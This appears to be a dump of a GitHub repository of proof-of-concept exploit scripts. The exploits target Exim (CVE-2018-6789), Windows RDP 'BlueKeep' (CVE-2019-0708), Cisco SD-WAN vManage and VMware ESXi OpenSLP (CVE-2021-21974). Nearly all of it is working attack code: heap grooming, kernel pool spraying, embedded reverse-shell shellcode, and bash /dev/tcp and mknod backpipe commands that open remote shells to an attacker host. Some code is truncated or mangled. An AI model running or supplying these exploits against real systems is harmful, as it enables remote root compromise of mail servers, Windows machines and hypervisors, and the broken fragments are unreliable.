├── CVE-2018-6789.py ├── CVE-2019-0708.py ├── CVE-2020–3387.html ├── CVE-2021-21974.py ├── CVE-2024-33891.py └── README.md /CVE-2018-6789.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import time 4 | import socket 5 | import struct 6 | 7 | s = None 8 | f = None 9 | 10 | def logo(): 11 | print 12 | print " CVE-2018-6789 Poc Exploit" 13 | print "@straight_blast ; straight426@gmail.com" 14 | print 15 | 16 | 17 | def connect(host, port): 18 | global s 19 | global f 20 | s = socket.create_connection((host,port)) 21 | f = s.makefile('rw', bufsize=0) 22 | 23 | def p(v): 24 | return struct.pack(" 0: 48 | encode = encode + s 49 | write("AUTH PLAIN " + encode) 50 | readuntil('data') 51 | 52 | def one_byte_overwrite(): 53 | v = "C" * 8200 54 | encode = v.encode('base64').replace('\n','').replace('=','') 55 | encode = encode[:-1] + "PE" 56 | write("AUTH PLAIN " + encode) 57 | readuntil('data') 58 | 59 | def exploit(remote_host, remote_port, local_host, local_port): 60 | 61 | connect(remote_host, remote_port) 62 | 63 | print "[0] connected to target -> " + remote_host + ":" + str(remote_port) 64 | 65 | time.sleep(0.5) 66 | 67 | ehlo("A" * 8000) 68 | 69 | ehlo("B" * 16) 70 | 71 | print "[1] finished grooming heap with 0x6060 block space" 72 | 73 | unrec("\xff" * 2000) 74 | 75 | ehlo("D" * 8200) 76 | 77 | one_byte_overwrite() 78 | 79 | print "[2] triggerd 1 byte overwrite vulnerability to extend the chunk size from 0x2021 to 0x20f1" 80 | 81 | fake_header = p(0) 82 | fake_header += p(0x1f51) 83 | auth_plain("E" * 176 + fake_header + "E" * (8200-176-len(fake_header))) 84 | 85 | print "[3] patched following store block with fake header so extended chunk can be freed" 86 | 87 | ehlo("F" * 16) 88 | 89 | print "[4] freed extended store block" 90 | 91 | unrec("\xff" * 2000) #filler against freed block 92 | 93 | unrec("\xff" * 2000) #filler against freed block 94 | 95 | fake_header = p(0x4110) 96 | fake_header += p(0x1f50) 97 | auth_plain("G" * 176 + fake_header + "G" * (8200-176-len(fake_header))) 98 | 99 | print "[5] patched store block with fake header so extended chunk can be malloced" 100 | 101 | #acl_store_block_partial_address = "\x80\xa4\x6e" 102 | acl_store_block_partial_address = "\xe0\xc8\x6c" 103 | 104 | auth_plain("H" * 8200 + p(0x2021) + acl_store_block_partial_address, "X") 105 | 106 | print "[6] finished using extend chunk to overwrite the overlapping store block's next pointer to an acl store block address" 107 | 108 | ehlo("I" * 16) 109 | 110 | print "[7] triggered smtp_reset_3(); with EHLO" 111 | 112 | # 288 is for github build 113 | # 1000 is for debian build 114 | #acl_smtp_rcpt_offset = 288 115 | acl_smtp_rcpt_offset = 1000-16 116 | 117 | cmd = "/bin/bash -c \"/bin/bash -i >& /dev/tcp/" + local_address + "/" + str(local_port) + " 0>&1\"" 118 | cmd_expansion_string = "${run{" + cmd + "}}\0" 119 | 120 | auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "\0" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string))) 121 | 122 | print "[8] malloced acl store block and overwrite the content of acl_smtp_rcpt with shell expression" 123 | 124 | write("MAIL FROM:") ; readuntil() 125 | 126 | write("RCPT TO:") 127 | 128 | print "[9] triggered RCPT TO which executes shell expression ... enjoy your shell!" 129 | 130 | print 131 | 132 | if __name__ == '__main__': 133 | logo() 134 | if len(sys.argv) < 5: 135 | print "Usage: ./exploit \n" 136 | exit() 137 | remote_address = sys.argv[1] 138 | remote_port = int(sys.argv[2]) 139 | local_address = sys.argv[3] 140 | local_port = int(sys.argv[4]) 141 | #print remote_address, remote_port, local_address, local_port 142 | exploit(remote_address, remote_port, local_address, local_port) 143 | -------------------------------------------------------------------------------- /CVE-2019-0708.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | from OpenSSL import * 5 | from struct import pack, unpack 6 | from sys import argv, exit 7 | 8 | class x224ConnectionRequestPacket: 9 | def __init__(self): 10 | # total of 8 bytes 11 | self.rdpNegReq = pack( 12 | ' 1110 (E) CDT -> 0000 (0) for class 0 and 1 25 | 0, # dest-ref , 2 bytes (fuzzable) 26 | 0, # src-ref , 2 bytes (fuzzable) 27 | 0, # class 0 28 | ) 29 | 30 | self.cr_tpdu = self.x224Crq + self.rdpNegReq 31 | 32 | self.tpkt_total_length = len(self.cr_tpdu) + 4 33 | 34 | self.tpktHeader = pack( 35 | '!BBH', 36 | 3, # version , 1 byte 37 | 0, # reserved , 1 byte 38 | self.tpkt_total_length # len (include the header) , 2 bytes 39 | ) 40 | 41 | self.pdu = self.tpktHeader + self.cr_tpdu 42 | 43 | 44 | 45 | class MCSConnectInitialPacket: 46 | def __init__(self, channels): 47 | 48 | self.channelDefArray = '' 49 | 50 | for channel in channels: 51 | self.channelDefArray += channel.ljust(8, '\x00') + '\x00' * 4 52 | 53 | self.clientNetworkData = pack(' 0: 302 | shellcode += '\x90' * (size - len(shellcode)) 303 | return shellcode 304 | else: 305 | print '[**] ring3 shellcode size exceeds maxmium supporting length [**]' 306 | exit(1) 307 | 308 | 309 | if __name__ == "__main__": 310 | 311 | channels = ['rdpdr', 'MS_T120', 'rdpsnd'] 312 | totalMCSChannels = len(channels) + 2 313 | origId = 1003 314 | lhost = '192.168.0.175' 315 | lport = 4444 316 | rhost = argv[1] 317 | rport = 3389 318 | 319 | print 320 | print '[*] CVE-2019-0708 (BlueKeep) RCE Exploit [*]' 321 | print '@straight_blast ; straightblast426@gmail.com' 322 | print 323 | 324 | print '[-] Establishing Connection' 325 | 326 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 327 | s.connect((rhost, rport)) 328 | 329 | data = sendX224Request(s) 330 | #print "x224 Connection Response: " + data.encode('hex') 331 | 332 | ctx = SSL.Context(SSL.TLSv1_METHOD) 333 | tls = SSL.Connection(ctx, s) 334 | tls.set_connect_state() 335 | tls.do_handshake() 336 | 337 | data = sendMCSGCC(tls, channels) 338 | #print "MCS GCC Response: " + data.encode('hex') 339 | 340 | sendErectDomainRequest(tls) 341 | 342 | data = sendAttachUserRequest(tls) 343 | #print "Attach User Response: " + data.encode('hex') 344 | 345 | initiator = unpack('>I', data[-2:].rjust(4,'\x00'))[0] 346 | #print "Initiator: " + str(initiator) 347 | 348 | for i in xrange(totalMCSChannels): 349 | data = sendChannelJoinRequest(tls, initiator, origId + i) 350 | #print "Join Confirm Response (" + str(origId + i) + "): " + data.encode('hex') 351 | 352 | data = sendClientInfo(tls) 353 | #print "Error Alert: " + data.encode('hex') 354 | 355 | data = tls.recv(8000) 356 | #print "Demand Active PDU: " + data.encode('hex') 357 | sendConfirmActivePDU(tls, initiator, origId + totalMCSChannels - 1) 358 | 359 | data = sendRdpPduType_Synchronize(tls, initiator, origId + totalMCSChannels - 1) 360 | #print "RDP PDU Type: Synchronize Response: " + data.encode('hex') 361 | 362 | data = sendRdpPduType_Control_Action_Cooperate(tls, initiator, origId + totalMCSChannels - 1) 363 | #print "RDP PDU Type: Control, Action: Cooperate Response: " + data.encode('hex') 364 | 365 | data = sendRdpPduType_Control_Action_RequestControl(tls, initiator, origId + totalMCSChannels - 1) 366 | #print "RDP PDU Type: Control, Action: Granted Control Response: " + data.encode('hex') 367 | 368 | data = sendRdpPduType_FontList(tls, initiator, origId + totalMCSChannels - 1) 369 | #print "RDP PDU Type: Fontmap Response: " + data.encode('hex') 370 | 371 | data = readFromVirtualChannel(tls) 372 | #print "RDPDR and RDPSND are now loaded" 373 | 374 | print '[-] Connection Stablized' 375 | 376 | print '[-] Freeing Object' 377 | free_mst120_channel = 'A' * 8 + '\x02' + '\x00' * 7 378 | sendToVirtualChannel(tls, free_mst120_channel, initiator, 1005) 379 | 380 | print '[-] Taking Over Freed Object And Pool Spraying' 381 | 382 | pool_size = 0x630 383 | 384 | pool_address = 0xfffffa80055ff980 385 | #pool_address = 0xfffffa800b5ff980 386 | 387 | pool_storage_address = pool_address + 0x48 388 | pool_shellcode_address = pool_address + 0x50 389 | 390 | fake_channel_object = '\x00' * 200 + pack('H', lport) + socket.inet_aton(lhost) + '\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5' 394 | 395 | shellcode = makeKernelUserPayload(reverse_shell, pool_size) 396 | 397 | payload = pack(' 2 | Cisco SD-WAN vManage 19.2.2 Remote Root Shell PoC 3 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /CVE-2021-21974.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | ###################################################################################################### 3 | # CVE-2021-21974 PoC Exploit 4 | # By: Johnny Yu (@staight_blast) 5 | # Tested against: 6 | # [1] VMware ESXi 6.7.0 build-14320388 ; VMware ESXi 6.7.0 Update 3 7 | # [2] VMware ESXi 6.7.0 build-16316930 ; VMware ESXi 6.7.0 Update 3 8 | ###################################################################################################### 9 | import sys 10 | import time 11 | import trace 12 | import queue 13 | import struct 14 | import socket 15 | import threading 16 | 17 | IP = sys.argv[1] 18 | #shell_cmd = b'echo "pwned" > /tmp/pwn' 19 | shell_cmd = b'mknod /tmp/backpipe p ; /bin/sh 0/tmp/backpipe' 20 | 21 | DEBUG = False 22 | PRINT = True 23 | LOG_LEAK = False 24 | 25 | T = 0.3 #0.4 26 | PORT = 427 27 | COMMAND = 'command' 28 | MARKER = b'\xef\xbe\xad\xde' 29 | 30 | LISTEN = 0x65 31 | STREAM_READ = 0x6c 32 | STREAM_WRITE = 0x6f 33 | STREAM_READ_FIRST = 0x6d 34 | 35 | LISTEN_FD = 0x8 36 | 37 | leaked_data = b'\x00\x00\x00\x00' 38 | leaked_values = None 39 | 40 | class SLP_Thread(threading.Thread): 41 | def __init__(self, input_q): 42 | super(SLP_Thread, self).__init__() 43 | self.input_q = input_q 44 | 45 | def run(self): 46 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 47 | while True: 48 | try: 49 | 50 | data = self.input_q.get(True, 0.05) 51 | name = threading.current_thread().name.replace('Thread','SLP Client') 52 | 53 | if 'connect' == data[COMMAND]: 54 | if PRINT: 55 | print('[' + name + '] connect') 56 | s.connect((IP, PORT)) 57 | 58 | elif 'service request' == data[COMMAND]: 59 | arg1 = data['arg1'] 60 | outgoing = self.generate_srv_rqst(arg1) 61 | if PRINT: 62 | print('[' + name + '] service request') 63 | s.send(outgoing) 64 | d = s.recv(1024) 65 | if PRINT: 66 | print('[' + name + '] recv: ', d) 67 | 68 | elif 'directory agent advertisement' == data[COMMAND]: 69 | arg1 = data['arg1'] 70 | arg2 = data['arg2'] 71 | outgoing = self.generate_da_advert(arg1, arg2) 72 | if PRINT: 73 | print('[' + name + '] directory agent advertisement') 74 | s.send(outgoing) 75 | d = s.recv(1024) 76 | if PRINT: 77 | print('[' + name + '] recv: ', d) 78 | 79 | elif 'service registration' == data[COMMAND]: 80 | arg1 = data['arg1'] 81 | arg2 = data['arg2'] 82 | arg3 = data['arg3'] 83 | arg4 = data['arg4'] 84 | outgoing = self.generate_srv_reg(arg1, arg2, arg3, arg4) 85 | if PRINT: 86 | print('[' + name + '] service registration') 87 | s.send(outgoing) 88 | d = s.recv(1024) 89 | if PRINT: 90 | print('[' + name +'] recv: ', d) 91 | 92 | elif 'attribute request' == data[COMMAND]: 93 | arg1 = data['arg1'] 94 | arg2 = data['arg2'] 95 | outgoing = self.generate_attrib_rqst(arg1) 96 | if PRINT: 97 | print('[' + name + '] attribute request') 98 | s.send(outgoing) 99 | output = b'' 100 | for i in range(0, arg2): 101 | output += s.recv(1) 102 | if PRINT: 103 | print('[' + name + '] recv: ', output) 104 | 105 | elif 'recv' == data[COMMAND]: 106 | output = b'' 107 | arg1 = data['arg1'] 108 | arg2 = data['arg2'] 109 | for i in range(0, arg2): 110 | output += s.recv(1) 111 | if arg1: 112 | print('[' + name + '] recv: ', output) 113 | 114 | elif 'leak data' == data[COMMAND]: 115 | outgoing = b'' 116 | incoming = b'' 117 | arg1 = data['arg1'] 118 | 119 | if arg1 > 0: 120 | 121 | for i in range(0, arg1): 122 | outgoing += s.recv(1) 123 | 124 | #print(outgoing.hex()) 125 | 126 | global leaked_data 127 | leaked_data = outgoing 128 | 129 | else: 130 | 131 | while True: 132 | incoming = s.recv(1) 133 | outgoing += incoming 134 | if MARKER in outgoing: 135 | break 136 | 137 | global leaked_values 138 | leaked_values = [] 139 | 140 | try: 141 | for i in range(0, len(outgoing), 4): 142 | v = struct.unpack(' 0x38: 296 | size = size - 0x38 297 | else: 298 | size = 1 299 | return service_request(b'A' * size) 300 | 301 | def breakpoint(): 302 | time.sleep(T) 303 | input('breakpoint') 304 | 305 | def exploit(): 306 | count = 60 307 | requests = [0] 308 | slpclients = [0] 309 | 310 | global leaked_data 311 | global leaked_values 312 | 313 | requests.extend([queue.Queue() for i in range(1, count)]) 314 | slpclients.extend([SLP_Thread(input_q = requests[i]) for i in range(1, count)]) 315 | 316 | for i in range(1, count): 317 | slpclients[i].start() 318 | 319 | requests[1].put(connect()) 320 | requests[1].put(da_advert_request(b'roflmao://pwning', b'BBB')) 321 | 322 | requests[2].put(connect()) 323 | requests[3].put(connect()) 324 | requests[4].put(connect()) 325 | requests[5].put(connect()) 326 | 327 | requests[2].put(block(0x40)) 328 | requests[3].put(block(0x40)) 329 | requests[4].put(block(0x40)) 330 | requests[5].put(block(0x40)) 331 | 332 | requests[6].put(connect()) 333 | requests[6].put(block(0x810)) 334 | requests[7].put(connect()) 335 | requests[8].put(connect()) 336 | requests[6].put(close()) 337 | requests[9].put(connect()) 338 | requests[9].put(overflow_and_extend(0x140, 0x1)) 339 | fd = 0xc 340 | requests[8].put(update_target_slpdsocket(fd, 0x140, STREAM_READ_FIRST)) 341 | requests[7].put(service_registration(b'service:pwn', MARKER + b'B' * (0x3200 - 21 - 4))) 342 | requests[8].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN)) 343 | requests[10].put(connect()) 344 | requests[10].put(block(0x70)) 345 | 346 | requests[11].put(connect()) 347 | requests[12].put(connect()) 348 | requests[13].put(connect()) 349 | requests[11].put(block(0x810)) 350 | requests[14].put(connect()) 351 | requests[14].put(block(0x160)) 352 | requests[12].put(block(0x810)) 353 | requests[14].put(close()) 354 | requests[15].put(connect()) 355 | requests[15].put(attribute_request(b'service:pwn', 0x20)) 356 | 357 | requests[13].put(block(0x110)) 358 | requests[16].put(connect()) 359 | requests[17].put(connect()) 360 | 361 | requests[12].put(close()) 362 | requests[18].put(connect()) 363 | requests[18].put(overflow_and_extend(0x120, 0x3)) 364 | requests[17].put(partial_update_target_send_buffer(0x120, 0x3220, 0x1, b'\x00\x00')) 365 | requests[19].put(connect()) 366 | requests[19].put(block(0x178)) 367 | 368 | requests[11].put(close()) 369 | requests[20].put(connect()) 370 | requests[20].put(overflow_and_extend(0x140, 0x1)) 371 | fd = 0x11 372 | requests[16].put(update_target_slpdsocket(fd, 0x140, STREAM_WRITE)) 373 | requests[16].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN)) 374 | requests[21].put(connect()) 375 | requests[21].put(block(0x178)) 376 | requests[15].put(leak_data()) 377 | 378 | time.sleep(T + 1.0) 379 | 380 | heap_address = 0 381 | libc_base_address = 0 382 | 383 | if leaked_values == None: 384 | print("[-] Exploit Failed [-]") 385 | return -1 386 | 387 | leaked_values = leaked_values[::-1] 388 | 389 | if LOG_LEAK: 390 | for i in leaked_values: 391 | print(hex(i)) 392 | 393 | if leaked_values[0] == 0xdeadbeef: 394 | heap_address = leaked_values[6] - 0x3220 + 0x4 395 | 396 | elif leaked_values[0] == 0xefeb3174: 397 | heap_offset = 0x2b1 if leaked_values[42] == 0x42424242 else 0x5d61 398 | heap_address = leaked_values[14] + heap_offset 399 | 400 | libc_leak_location = heap_address - 0x100 + 4 401 | 402 | requests[22].put(connect()) 403 | requests[22].put(block(0x810)) 404 | requests[23].put(connect()) 405 | requests[23].put(block(0x100)) 406 | requests[24].put(connect()) 407 | requests[24].put(block(0x810)) 408 | requests[23].put(close()) 409 | requests[25].put(connect()) 410 | requests[25].put(block(0x698)) 411 | 412 | requests[27].put(connect()) 413 | requests[28].put(connect()) 414 | 415 | requests[24].put(close()) 416 | requests[26].put(connect()) 417 | requests[26].put(overflow_and_extend(0x130, 0x1)) 418 | requests[27].put(update_target_send_buffer(0x130, 0x598, 0x1, libc_leak_location, 0x4)) 419 | requests[29].put(connect()) 420 | requests[29].put(block(0x178)) 421 | 422 | requests[22].put(close()) 423 | requests[30].put(connect()) 424 | requests[30].put(overflow_and_extend(0x140, 0x1)) 425 | fd = 0x15 426 | requests[28].put(update_target_slpdsocket(fd, 0x140, STREAM_WRITE)) 427 | requests[28].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN)) 428 | requests[31].put(connect()) 429 | requests[31].put(block(0x178)) 430 | requests[25].put(leak_data(0x4)) 431 | 432 | time.sleep(T + 1.0) 433 | libc_base_address = struct.unpack('